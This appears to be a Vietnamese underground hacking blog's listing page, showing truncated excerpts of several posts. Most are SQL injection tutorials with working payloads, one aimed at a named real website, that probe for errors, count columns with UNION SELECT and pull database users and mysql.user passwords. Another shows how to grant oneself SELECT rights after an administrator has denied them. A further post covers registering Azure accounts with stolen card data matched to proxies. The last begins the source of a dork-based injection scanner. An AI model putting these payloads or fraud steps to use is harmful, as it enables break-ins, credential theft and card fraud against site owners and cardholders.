TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25' Quote: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 select * FROM customer_testimonials WHERE testimonials_id = 25\'  de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc  https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/* bat ra 1 page voi gia tri true = 1  https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/* bat ra 1 page voi gia tri false = 0 anh em du dk tren thi tien hanh hack site nha' bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi  https://www.185elgin.com/customer_te...,3,4,5,6,7,8-- Querry...

Read more »

Posted in: Hacking,Tutorial,UG

hack shop bị deny SELECT

bình thường khi query Quote: convert(int,(select top 1 table_name from information_schema.tables))--[ bay ra lỗi Quote: Syntax error converting the nvarchar value 'table_name' to a column of data type int[/b] nhưng nếu bay ra lỗi Quote: SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'. thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn. thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` . dùng query sau: Quote: ;use dataname grant keyword on tables to public trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc query fat nào Quote: ;use vnc grant select on sysobjects to public-- hack xong ta lại deny mẹ cái select cho thằng vịt khác ko hack dc ...

Read more »

Posted in: Hacking,Tutorial,UG

TUT hack php part2

Lỗi MySQL là một lỗi rất là thông dụng và nguy hiểm.Khác với các lỗi khác MySQL bị lỗi là cho người viết mã gây ra hay bị sai sót Lỗi MySQL đem lại những lợi ích như thế nào? Nó cho phép người sử dụng có thể khai thác dễ dàng vào các database.Nói rõ hơn nó cho ta thấy được những thông số có liên quan đến victim chứa lỗi.MySQL Inj có thể phá hủy tập tin hay cho phép các tập tin khác mà attacker chèn vào Bây giờ chúng ta nhìn vào 1 số ví dụ về code php <? php ... $ id = $ _GET [ 'id']; ... mysql_query ( "UNION SELECT nick FROM users WHERE id =". );..... $ id ?>  Chúng ta cần lưu ý về phương thức lấy đoạn ma GET .Anh em hãy để ý kỹ về đoạn mã php ở trên.Chúng ta có thể thay đổi yêu cầu truy vấn dựa vào GET.Nếu nó không lọc phần [ 'id'] mà chúng ta truy vấn vào dữ liệu của victim thì...

Read more »

Posted in: Hacking,Tutorial,UG

TUT hack php

http://www.site.ru/index.php?page=1 ' Bay ra 1 cái đại loại thế nè  MySQL Error: mysql_query (.......) error expretion syntax ... 99% lỗi số col nhé Quote: ? id =- 1 + + by order +7 / * đến 7 nó lỗi mà 6 chưa lỗi thì Quote: http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / * hình ở link nó hiện ra số,exp là 3 Quote: http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *->user Quote: http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *->version Quote: http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *--database name get pass mysql Quote: http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / * Get...

Read more »

Posted in: Hacking,Tutorial,UG

Reg Azure của microsoft fix

http://mkhahero.blogspot.com/2011/02/tutfang-vps-windows-azure.html thay đổi tí : Sock trùng city của cvv c2 : zipcode,city,state >>>> 3 cái này chỉnh theo info sock. TUT fix by mkhahero ( đừng thằng nào nói leech )...

Read more »

Posted in: Tutorial,UG

PHP : Dork Scanner SQL Injection

<html><head><title>Masokis SQLi Scanner</title><style>body{background: #0F0F0F;color: #F9F9F9;font-family: monospace;font-size: 12px;} input{background: #0F0FCC;border: 1px solid #00FFCC;color: #00FFCC;} h2{color: #55FFCC;} a{ color: #5A5A5A; text-decoration: none; }a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }a:hover{ color: #00FFCC; text-decoration: line-through; }.effectok:hover { text-decoration: underline; }.effectfalse:hover { text-decoration: line-through; } </style> </head><body align="center"> <?phpecho "<h2>SQLI Online Scanner</h2>";echo "<form action='' method='post'>";echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";echo "<input...

Read more »

Posted in: code,Web Application